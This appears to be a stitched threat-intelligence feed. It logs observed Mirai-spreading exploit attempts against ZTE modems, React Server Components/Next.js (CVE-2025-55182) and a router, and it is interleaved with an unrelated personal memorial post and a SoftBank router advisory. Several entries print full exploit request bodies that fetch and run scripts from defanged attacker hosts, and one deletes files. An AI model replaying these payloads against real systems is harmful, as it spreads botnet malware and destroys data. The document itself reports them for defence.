172.245.21[.]30 is trying to exploit CVE-2014-2321, ZTE F460 and F660 cable modems RCE with the command:
POST /web_shell_cmd.gch post_input IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+hXXp://107.172.79[.]248+ins/mips+-O+/var/tmp/init.norm&CmdAck="
Target 107.172.79[.]248 is currently rejecting connection
43.228.157[.]64 is trying to exploit CVE-2025-55182 (React2Shell) to spread Mirai Botnet Malware with the command:
POST /api/action 443 posted 0={"_response":{"_formData":{"get":"$1:constructor:constructor"},"_prefix":"var+res+=+process.mainModule.require('child_process').execSync('wget+-qO+-+hXXp://83.142.209[.]47/x+|+bash;+curl+-sLk+hXXp://83.142.209[.]47/x+|+bash',{timeout:5000}).toString().trim();+throw+Object.assign(new+Error('NEXT_REDIRECT'),+{digest:`${res}`});"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then","value":"{\"then\":+\"$B0\"}"}&1="$@0""
hXXp://83.142.209[.]47/x is a bash script that downloads and executes Mirai variants for different architectures.
We knew each other for some time, as we had common friends, but it wasn't until BlackHat Europe 2010 when we became friends.
The Eyjafjallajökull volcano eruption left us stranded in Barcelona for a week and, as the "formerly local" person, I was the go to person to fill the day waiting for the planes to come back. I remember looking for cars to drive back to Berlin and you nearly bought one. The only stopper was the lack of insurance. You could do lots of crazy stuff, but as german, you don't fuck a around with cars. German brands only, Insurance is a must!
I introduced you to my local friends which they still remember you when we get together, and we watched Barça with DT in a crappy bar.
Eyjafjallajökull became a running joke and you even came to a CCCamp with a t-shirt with Eyjafjallajökull printed in it. I guess I never said it, but it meant a lot to me.
This summer I visited Eyjafjallajökull and I sent you a picture of it, which trigger some funny conversations and a reconnection. Now, I wish I had been more active.
Hack the planet my friend. #FX
193.142.146[.]230 is trying to exploit CVE-2023-26801 to spread Mirai Botnet Malware with the command:
POST /goform/set_LimitClient_cfg time1=00:00-00:00&time2=00:00-00:00&mac=;wget hXXp://45.194.92[.]39/o; curl -O hXXp://45.194.92[.]39/o; chmod 777 o; sh o; rm -rf o; rm -rf o.*"
hXXp://45.194.92[.]39/o is a bash script that downloads and executes Mirai variants for different architectures.
176.65.139[.]36 is trying to exploit CVE-2025-55182 (React2Shell): Remote code execution in React Server Components and Next.js with the POST:
0="$1"&1={"status":"resolved_model","reason":0,"_response":"$5","value":"{\"then\":\"$4:map\",\"0\":{\"then\":\"$B3\"},\"length\":1}","then":"$2:then"}&2="$@3"&3=""&4=[]&5={"_bundlerConfig":{},"_chunks":"$2:_response:_chunks","_formData":{"get":"$4:constructor:constructor"},"_prefix":"(function(){\n try {\n var res = process.mainModule.require(\"child_process\").execSync(\"cd /tmp; rm -rf *; pkill xd.x86; wget hXXp://94.156.152[.]67/xd.x86; curl -O hXXp://94.156.152[.]67/xd.x86; chmod 777 xd.x86; ./xd.x86 nextjs\").toString();\n console.log(\"\\n[ ] RCE RESULT:\\n\" res);\n throw new Error(\"[ ] RCE SUCCESS: \" res);\n
SoftBank RP562B Wi-Fi Mesh under the Microscope
https://neroteam.com/blog/softbank-wi-fi-mesh-rp562b
[CVE-2024-47799] - Active debug code (CWE-489).
The SoftBank Mesh RP562B is affected by Missing Authentication for Critical Function in the /data/activation.json endpoint.
The Shadowserver Foundation